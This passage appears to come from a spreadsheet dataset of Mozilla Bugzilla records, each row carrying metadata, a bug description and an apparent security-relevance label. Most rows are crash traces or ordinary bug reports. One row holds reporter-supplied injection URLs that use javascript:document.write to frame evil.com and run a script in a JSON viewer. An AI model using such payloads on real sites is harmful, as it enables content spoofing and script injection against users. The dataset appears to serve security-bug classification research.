#3  0x13460f16 in MOZ_PNG_push_have_row (png_ptr=0x5305de00, row=0x5306ffd1 "") at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:1732
#4  0x1346066a in MOZ_PNG_push_proc_row (png_ptr=0x5305de00) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:1029
#5  0x13460429 in MOZ_PNG_proc_IDAT_data (png_ptr=0x5305de00, buffer=0xf173e595 "x??y?\034?}??y??UgW??@\003??M\020 \001R?(??(?ƒ|??̄|??^Gػ????????\0373??#bg&amp;&lt;\023\033?3?Þ?ږ?;?aY?i?\"EJ?O", buffer_length=2655) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:980
#6  0x13460239 in MOZ_PNG_push_read_IDAT (png_ptr=0x5305de00) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:911
#7  0x1345e9e6 in MOZ_PNG_proc_some_data (png_ptr=0x5305de00, info_ptr=0x53067f60) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:61
#8  0x1345e95d in MOZ_PNG_process_data (png_ptr=0x5305de00, info_ptr=0x53067f60, buffer=0xf173dff4 ",???.???C\f???????\031?\017h?쩉?X?\"?\032????u&gt;????W?j?\v\023Zhͳ? L&amp;?d?Q^\023??\005\nr?g\032?\032?6?\024?z\024?\017C? \004}38\022(?˔\020?e?.AF??\0340\006??\b?=Sc", buffer_size=4096) at /Volumes/data_apps/mozilla/modules/libimg/png/pngpread.c:36
#9  0x1343569b in ReadDataOut (in=0x46ea9f6c, closure=0x5305bfc0, fromRawSegment=0xf173dff4 ",???.???C\f???????\031?\017h?쩉?X?\"?\032????u&gt;????W?j?\v\023Zhͳ? L&amp;?d?Q^\023??\005\nr?g\032?\032?6?\024?z\024?\017C? \004}38\022(?˔\020?e?.AF??\0340\006??\b?=Sc", toOffset=20480, count=4096, writeCount=0xbfffd2c4) at /Volumes/data_apps/mozilla/modules/libpr0n/decoders/png/nsPNGDecoder.cpp:335
#10 0x00370c5b in nsPipeInputStream::ReadSegments (this=0x46ea9f6c, writer=0x134355ee &lt;ReadDataOut&gt;, closure=0x5305bfc0, count=45056, readCount=0xbfffd564) at /Volumes/data_apps/mozilla/xpcom/io/nsPipe3.cpp:799
Reproducible: Always</t>
        </is>
      </c>
      <c r="X1688" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1689">
      <c r="A1689" t="n">
        <v>1435880</v>
      </c>
      <c r="B1689" t="inlineStr">
        <is>
          <t>2018-02-05 14:35:28 -0800</t>
        </is>
      </c>
      <c r="C1689" t="inlineStr">
        <is>
          <t>Handle moving/detaching tabs between windows when a Payment Request is showing</t>
        </is>
      </c>
      <c r="D1689" t="inlineStr">
        <is>
          <t>2020-02-20 17:54:32 -0800</t>
        </is>
      </c>
      <c r="E1689" t="n">
        <v>1</v>
      </c>
      <c r="F1689" t="n">
        <v>1</v>
      </c>
      <c r="G1689" t="n">
        <v>2</v>
      </c>
      <c r="H1689" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1689" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1689" t="inlineStr">
        <is>
          <t>WebPayments UI</t>
        </is>
      </c>
      <c r="K1689" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1689" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1689" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1689" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1689" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1689" t="inlineStr">
        <is>
          <t>[webpayments]</t>
        </is>
      </c>
      <c r="Q1689" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1689" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1689" t="inlineStr">
        <is>
          <t>Firefox 65</t>
        </is>
      </c>
      <c r="T1689" t="n">
        <v>1</v>
      </c>
      <c r="U1689" t="n">
        <v>0</v>
      </c>
      <c r="V1689" t="n">
        <v>17</v>
      </c>
      <c r="W1689" t="inlineStr">
        <is>
          <t>If a Payment Request tab-modal dialog is showing and the tab is dragged to an existing window or detached to a new window, the Payment Request dialog should continue to be shown in that new window.</t>
        </is>
      </c>
      <c r="X1689" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1690">
      <c r="A1690" t="n">
        <v>1364888</v>
      </c>
      <c r="B1690" t="inlineStr">
        <is>
          <t>2017-05-15 06:31:07 -0700</t>
        </is>
      </c>
      <c r="C1690" t="inlineStr">
        <is>
          <t>Update from AngularJS 1.5 to 1.6</t>
        </is>
      </c>
      <c r="D1690" t="inlineStr">
        <is>
          <t>2018-01-09 06:57:26 -0800</t>
        </is>
      </c>
      <c r="E1690" t="n">
        <v>1</v>
      </c>
      <c r="F1690" t="n">
        <v>1</v>
      </c>
      <c r="G1690" t="n">
        <v>7</v>
      </c>
      <c r="H1690" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1690" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1690" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K1690" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1690" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1690" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1690" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1690" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1690" t="inlineStr"/>
      <c r="Q1690" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1690" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1690" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1690" t="n">
        <v>1</v>
      </c>
      <c r="U1690" t="n">
        <v>0</v>
      </c>
      <c r="V1690" t="n">
        <v>11</v>
      </c>
      <c r="W1690" t="inlineStr">
        <is>
          <t>We're currently using 1.5.11.
The 1.6 release includes a number of bug fixes and performance improvements:
https://github.com/angular/angular.js/blob/master/CHANGELOG.md#160-rainbow-tsunami-2016-12-08
Upgrade guide:
https://docs.angularjs.org/guide/migration#migrating-from-1-5-to-1-6</t>
        </is>
      </c>
      <c r="X1690" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1691">
      <c r="A1691" t="n">
        <v>1342661</v>
      </c>
      <c r="B1691" t="inlineStr">
        <is>
          <t>2017-02-25 06:00:13 -0800</t>
        </is>
      </c>
      <c r="C1691" t="inlineStr">
        <is>
          <t>Out of bound read in nsBinHexDecoder::DetectContentType</t>
        </is>
      </c>
      <c r="D1691" t="inlineStr">
        <is>
          <t>2024-05-30 09:29:39 -0700</t>
        </is>
      </c>
      <c r="E1691" t="n">
        <v>1</v>
      </c>
      <c r="F1691" t="n">
        <v>1</v>
      </c>
      <c r="G1691" t="n">
        <v>3</v>
      </c>
      <c r="H1691" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1691" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1691" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1691" t="inlineStr">
        <is>
          <t>51 Branch</t>
        </is>
      </c>
      <c r="L1691" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1691" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1691" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1691" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1691" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q1691" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1691" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1691" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T1691" t="n">
        <v>1</v>
      </c>
      <c r="U1691" t="n">
        <v>0</v>
      </c>
      <c r="V1691" t="n">
        <v>26</v>
      </c>
      <c r="W1691" t="inlineStr">
        <is>
          <t>Created attachment 8841189
binhex.hqx
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Steps to reproduce:
1. Build Firefox with Address Sanitizer.
   I built with options and instructions  mentioned in "Manual Build" section in
   https://developer.mozilla.org/en-US/docs/Mozilla/Testing/Firefox_and_Address_Sanitizer
2. Start firefox.
3. Open attached binhex.hqx.
Actual results:
Address Sanitizer will display this error.
==28086==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000232040 at pc 0x00000044b58e bp 0x7fff4a98c270 sp 0x7fff4a98ba20
READ of size 10 at 0x602000232040 thread T0 (Web Content)
    #0 0x44b58d in __interceptor_strrchr.part.28 clang/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:499
    #1 0x44b58d in ?? ??:0
    #2 0x7f984665893e in mozilla::net::nsBinHexDecoder::DetectContentType(nsIRequest*, nsCString const&amp;) /firefox/netwerk/streamconv/converters/nsBinHexDecoder.cpp:486 (discriminator 2)
    #3 0x7f984665893e in ?? ??:0
    #4 0x7f9846657dd9 in mozilla::net::nsBinHexDecoder::ProcessNextState(nsIRequest*, nsISupports*) /firefox/netwerk/streamconv/converters/nsBinHexDecoder.cpp:185
    #5 0x7f9846657dd9 in ?? ??:0
    #6 0x7f984665731d in mozilla::net::nsBinHexDecoder::ProcessNextChunk(nsIRequest*, nsISupports*, unsigned int) /firefox/netwerk/streamconv/converters/nsBinHexDecoder.cpp:408
    #7 0x7f984665731d in ?? ??:0
    #8 0x7f9846656b24 in mozilla::net::nsBinHexDecoder::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /firefox/netwerk/streamconv/converters/nsBinHexDecoder.cpp:141
    ...................
0x602000232040 is located 0 bytes to the right of 16-byte region [0x602000232030,0x602000232040)
allocated by thread T0 (Web Content) here:
    #0 0x4d2628 in __interceptor_malloc _asan_rtl_
    #1 0x4d2628 in ?? ??:0
    #2 0x7f9845f57709 in nsStringBuffer::Alloc(unsigned long) /firefox/xpcom/string/nsSubstring.cpp:217
    #3 0x7f9845f57709 in ?? ??:0
    #4 0x7f9845f55b94 in nsACString_internal::MutatePrep(unsigned int, char**, unsigned int*) /firefox/xpcom/string/nsTSubstring.cpp:158
    #5 0x7f9845f55b94 in ?? ??:0
    #6 0x7f9845f4ae40 in nsACString_internal::SetCapacity(unsigned int, mozilla::fallible_t const&amp;) /firefox/xpcom/string/nsTSubstring.cpp:696
    #7 0x7f9845f4ae40 in ?? ??:0
    #8 0x7f9845f5eb2c in nsACString_internal::SetCapacity(unsigned int) /firefox/xpcom/string/nsTSubstring.cpp:675
    #9 0x7f9845f5eb2c in ?? ??:0
    #10 0x7f9845f4a741 in nsACString_internal::SetLength(unsigned int) /firefox/xpcom/string/nsTSubstring.cpp:727
    #11 0x7f9845f4a741 in ?? ??:0
    #12 0x7f9846657ce6 in mozilla::net::nsBinHexDecoder::ProcessNextState(nsIRequest*, nsISupports*) /firefox/netwerk/streamconv/converters/nsBinHexDecoder.cpp:170
    #13 0x7f9846657ce6 in ?? ??:0
    #14 0x7f984665731d in mozilla::net::nsBinHexDecoder::ProcessNextChunk(nsIRequest*, nsISupports*, unsigned int) /firefox/netwerk/streamconv/converters/nsBinHexDecoder.cpp:408
    #15 0x7f984665731d in ?? ??:0
    #16 0x7f9846656b24 in mozilla::net::nsBinHexDecoder::OnDataAvailable(nsIRequest*, nsISupports*, nsIInputStream*, unsigned long, unsigned int) /firefox/netwerk/streamconv/converters/nsBinHexDecoder.cpp:141
    ...................
Expected results:
Should not read out of bound data .</t>
        </is>
      </c>
      <c r="X1691" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1692">
      <c r="A1692" t="n">
        <v>986843</v>
      </c>
      <c r="B1692" t="inlineStr">
        <is>
          <t>2014-03-22 09:32:25 -0700</t>
        </is>
      </c>
      <c r="C1692" t="inlineStr">
        <is>
          <t>AutoHoldZone is a hazard with IGC</t>
        </is>
      </c>
      <c r="D1692" t="inlineStr">
        <is>
          <t>2015-08-30 12:00:51 -0700</t>
        </is>
      </c>
      <c r="E1692" t="n">
        <v>1</v>
      </c>
      <c r="F1692" t="n">
        <v>1</v>
      </c>
      <c r="G1692" t="n">
        <v>3</v>
      </c>
      <c r="H1692" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1692" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1692" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1692" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1692" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1692" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1692" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1692" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1692" t="inlineStr">
        <is>
          <t>[qa-][adv-main29+][adv-esr24.5+]</t>
        </is>
      </c>
      <c r="Q1692" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1692" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1692" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T1692" t="n">
        <v>1</v>
      </c>
      <c r="U1692" t="n">
        <v>0</v>
      </c>
      <c r="V1692" t="n">
        <v>40</v>
      </c>
      <c r="W1692" t="inlineStr">
        <is>
          <t>I spent a few hours mulling over bug 960828 with sfink, terrence, and jonco yesterday. We were still stuck when we left off, but I had an epiphany this morning, and think I have this figured out.
The key point here is that the global doesn't actually get collected (that's why we never see the finalizer running). But but the global's _compartment_ does. So global-&gt;global() (the culprit, as identified in bug 960828 comment 72), which compiles down to global()-&gt;compartment()-&gt;maybeGlobal(), returns garbage, rather than identity.
The scenario goes like this. XPConnect invokes JS_NewGlobalObject, whose first act of business is to invoke js::NewCompartment. This creates a compartment, and cannot GC. Then, before the call to GlobalObject::create (which can GC), we instantiate an AutoHoldZone instance. Once the global object is created, it is rooted (by virtue of either being on the stack or being in a Rooted&lt;&gt;, depending on the rooting configuration), and therefore its compartment is held alive too.
But AutoHoldZone isn't actually good enough. It prevents the zone (and therefore the compartment) from being swept, but it doesn't actually mark anything. So if we happen to begin a GC at the very beginning of GlobalObject::create (before the global itself is actually allocated), we'll do the marking phase, and fail to mark the freshly-allocated compartment. We then return from JS_NewGlobalObject (at which point the AutoHoldZone is out of scope), and at some point later finish up the incremental sweeping. SweepZones invokes SweepCompartments, which finds the compartment unmarked, and deletes it. Boom.
We could mark AutoHoldZone smarter, but it might be simpler to just manually GC (if we're getting close) at the beginning of JS_NewGlobalObject, and then use an AutoLockGC for the rest of the call, since this is touchy stuff.
GC hackers - thoughts? Once we agree on the approach, I'll go ahead and write the patch.</t>
        </is>
      </c>
      <c r="X1692" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1693">
      <c r="A1693" t="n">
        <v>465741</v>
      </c>
      <c r="B1693" t="inlineStr">
        <is>
          <t>2008-11-19 07:56:41 -0800</t>
        </is>
      </c>
      <c r="C1693" t="inlineStr">
        <is>
          <t>Resolution display at top of bug doesn't display what the duplicate bug is</t>
        </is>
      </c>
      <c r="D1693" t="inlineStr">
        <is>
          <t>2008-11-20 18:12:02 -0800</t>
        </is>
      </c>
      <c r="E1693" t="n">
        <v>1</v>
      </c>
      <c r="F1693" t="n">
        <v>1</v>
      </c>
      <c r="G1693" t="n">
        <v>4</v>
      </c>
      <c r="H1693" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1693" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1693" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K1693" t="inlineStr">
        <is>
          <t>3.2</t>
        </is>
      </c>
      <c r="L1693" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1693" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1693" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1693" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1693" t="inlineStr"/>
      <c r="Q1693" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1693" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1693" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T1693" t="n">
        <v>1</v>
      </c>
      <c r="U1693" t="n">
        <v>1</v>
      </c>
      <c r="V1693" t="n">
        <v>6</v>
      </c>
      <c r="W1693" t="inlineStr">
        <is>
          <t>Consider bug 465729. When looking at it I can see that the bug has been marked as a duplicate of something. I don't know what though and I must click the edit button to find out.</t>
        </is>
      </c>
      <c r="X1693" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1694">
      <c r="A1694" t="n">
        <v>1442840</v>
      </c>
      <c r="B1694" t="inlineStr">
        <is>
          <t>2018-03-02 19:41:25 -0800</t>
        </is>
      </c>
      <c r="C1694" t="inlineStr">
        <is>
          <t>Iframe injection &amp; content spoofing &amp; scripts execution via json viewer</t>
        </is>
      </c>
      <c r="D1694" t="inlineStr">
        <is>
          <t>2024-05-30 09:43:30 -0700</t>
        </is>
      </c>
      <c r="E1694" t="n">
        <v>1</v>
      </c>
      <c r="F1694" t="n">
        <v>1</v>
      </c>
      <c r="G1694" t="n">
        <v>3</v>
      </c>
      <c r="H1694" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1694" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J1694" t="inlineStr">
        <is>
          <t>JSON Viewer</t>
        </is>
      </c>
      <c r="K1694" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L1694" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1694" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1694" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1694" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1694" t="inlineStr">
        <is>
          <t>[adv-main60+]</t>
        </is>
      </c>
      <c r="Q1694" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1694" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1694" t="inlineStr">
        <is>
          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T1694" t="n">
        <v>1</v>
      </c>
      <c r="U1694" t="n">
        <v>0</v>
      </c>
      <c r="V1694" t="n">
        <v>44</v>
      </c>
      <c r="W1694" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Build ID: 20180206200532
Steps to reproduce:
Hello  , 
When we have a response of json with a parameter that a client can edit we can spoof the content wyciwyg using ("javascript:)
Example in gdata.youtube.com
Just visit the link below and click in javascript :
https://gdata.youtube.com/feeds/api/videos?format=5&amp;max-results=8&amp;v=%22JUST---CLICK-HERE--%3E%22javascript:document.write(/%3Ciframe%2520src=http:evil.com%3E/)&amp;alt=jsonc
Or 
https://gdata.youtube.com/feeds/api/videos?format=5&amp;max-results=8&amp;v=%22javascript:document.write(%2527%3Cscript%3Ealert(document.location)%3C/script%3E%2527)&amp;alt=jsonc
We can see that we have a frame of evil.com in gdata.youtube.com we can also execute a scripts using the same method .
The frame is injected in view-source:wyciwyg://99/https://gdata.youtube.com......</t>
        </is>
      </c>
      <c r="X1694" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1695">
      <c r="A1695" t="n">
        <v>1555752</v>
      </c>
      <c r="B1695" t="inlineStr">
        <is>
          <t>2019-05-30 10:06:53 -0700</t>
        </is>
      </c>
      <c r="C1695" t="inlineStr">
        <is>
          <t>Hard to determine that wrong Pulse credentials have been used</t>
        </is>
      </c>
      <c r="D1695" t="inlineStr">
        <is>
          <t>2020-03-26 06:00:44 -0700</t>
        </is>
      </c>
      <c r="E1695" t="n">
        <v>1</v>
      </c>
      <c r="F1695" t="n">
        <v>1</v>
      </c>
      <c r="G1695" t="n">
        <v>7</v>
      </c>
      <c r="H1695" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1695" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1695" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1695" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1695" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1695" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1695" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1695" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1695" t="inlineStr"/>
      <c r="Q1695" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1695" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1695" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1695" t="n">
        <v>1</v>
      </c>
      <c r="U1695" t="n">
        <v>0</v>
      </c>
      <c r="V1695" t="n">
        <v>6</v>
      </c>
      <c r="W1695" t="inlineStr">
        <is>
          <t>If a user tries to follow the Pulse instructions and uses the wrong credentials the command to ingest will not fail. It will just do nothing.
I'm happy to fix this with some direction.
```bash
root@2c14ad4a3716:/app# ./manage.py pulse_listener_jobs
/app/treeherder/etl/schema.py:13: YAMLLoadWarning: calling yaml.load() without Loader=... is deprecated, as the default Loader is unsafe. Please read https://msg.pyyaml.org/load for full details.
  schema = yaml.load(f)
/usr/local/lib/python3.7/site-packages/rest_framework/exceptions.py:18: DeprecationWarning: 'version' is deprecated. Use '__version__' instead.
  from rest_framework.compat import unicode_to_repr
```</t>
        </is>
      </c>
      <c r="X1695" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1696">
      <c r="A1696" t="n">
        <v>1731779</v>
      </c>
      <c r="B1696" t="inlineStr">
        <is>
          <t>2021-09-21 05:55:11 -0700</t>
        </is>
      </c>
      <c r="C1696" t="inlineStr">
        <is>
          <t>download protection bypass on macOS with .inetloc</t>
        </is>
      </c>
      <c r="D1696" t="inlineStr">
        <is>
          <t>2024-05-30 10:36:40 -0700</t>
        </is>
      </c>
      <c r="E1696" t="n">
        <v>1</v>
      </c>
      <c r="F1696" t="n">
        <v>1</v>
      </c>
      <c r="G1696" t="n">
        <v>2</v>
      </c>
      <c r="H1696" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1696" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1696" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K1696" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1696" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M1696" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1696" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1696" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1696" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main94+][adv-esr91.3+]</t>
        </is>
      </c>
      <c r="Q1696" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1696" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S1696" t="inlineStr">
        <is>
          <t>95 Branch</t>
        </is>
      </c>
      <c r="T1696" t="n">
        <v>1</v>
      </c>
      <c r="U1696" t="n">
        <v>0</v>
      </c>
      <c r="V1696" t="n">
        <v>17</v>
      </c>
      <c r="W1696" t="inlineStr">
        <is>
          <t>Created attachment 9242268
test.inetloc
firefox Version: 92.0
Operating System: macOS Big Sur, 11.5.2
Vladimir Metnew reported that .fileloc files on macOS can bypass download protection in 2019:https://bugzilla.mozilla.org/show_bug.cgi?id=1596668
However, .inetloc files are similar to .fileloc files and .inetloc is not in blacklist.
When open a .fileloc file in firefox, firefox will warn:" 'test.fileloc' is an executable file. Executable files may contain viruses or other malicious code that could harm your computer. Use caution when opening this file. Are you sure you want to launch 'test.fileloc'? "
But when open a .inetloc file in firefox there is no warning and attacker may execute arbitrary commands.
I provided a test.inetloc which can open calc for test.</t>
        </is>
      </c>
      <c r="X1696" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1697">
      <c r="A1697" t="n">
        <v>1270381</v>
      </c>
      <c r="B1697" t="inlineStr">
        <is>
          <t>2016-05-04 22:56:54 -0700</t>
        </is>
      </c>
      <c r="C1697" t="inlineStr">
        <is>
          <t>HTML5 parser heap-buffer-overflow</t>
        </is>
      </c>
      <c r="D1697" t="inlineStr">
        <is>
          <t>2024-05-30 09:17:07 -0700</t>
        </is>
      </c>
      <c r="E1697" t="n">
        <v>1</v>
      </c>
      <c r="F1697" t="n">
        <v>1</v>
      </c>
      <c r="G1697" t="n">
        <v>3</v>
      </c>
      <c r="H1697" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1697" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1697" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K1697" t="inlineStr">
        <is>
          <t>46 Branch</t>
        </is>
      </c>
      <c r="L1697" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1697" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1697" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1697" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1697" t="inlineStr">
        <is>
          <t>[adv-main47+][adv-esr45.2+] btpp-active</t>
        </is>
      </c>
      <c r="Q1697" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1697" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1697" t="inlineStr">
        <is>
          <t>mozilla49</t>
        </is>
      </c>
      <c r="T1697" t="n">
        <v>1</v>
      </c>
      <c r="U1697" t="n">
        <v>0</v>
      </c>
      <c r="V1697" t="n">
        <v>19</v>
      </c>
      <c r="W1697" t="inlineStr">
        <is>
          <t>Created attachment 8749033
Detail report: minimized PoC, demo exploit, asan 49 log, brief of analysis
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36
Steps to reproduce:
Using Firefox to load proof-of-concept code
Actual results:
Firefox crashed.</t>
        </is>
      </c>
      <c r="X1697" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1698">
      <c r="A1698" t="n">
        <v>779849</v>
      </c>
      <c r="B1698" t="inlineStr">
        <is>
          <t>2012-08-02 07:44:38 -0700</t>
        </is>
      </c>
      <c r="C1698" t="inlineStr">
        <is>
          <t>Flash Plugin related Assertion failure: false (compartment mismatched)</t>
        </is>
      </c>
      <c r="D1698" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E1698" t="n">
        <v>1</v>
      </c>
      <c r="F1698" t="n">
        <v>1</v>
      </c>
      <c r="G1698" t="n">
        <v>6</v>
      </c>
      <c r="H1698" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1698" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J1698" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K1698" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1698" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1698" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1698" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1698" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1698" t="inlineStr">
        <is>
          <t>[advisory-tracking+] regression from bug 771202</t>
        </is>
      </c>
      <c r="Q1698" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1698" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1698" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T1698" t="n">
        <v>1</v>
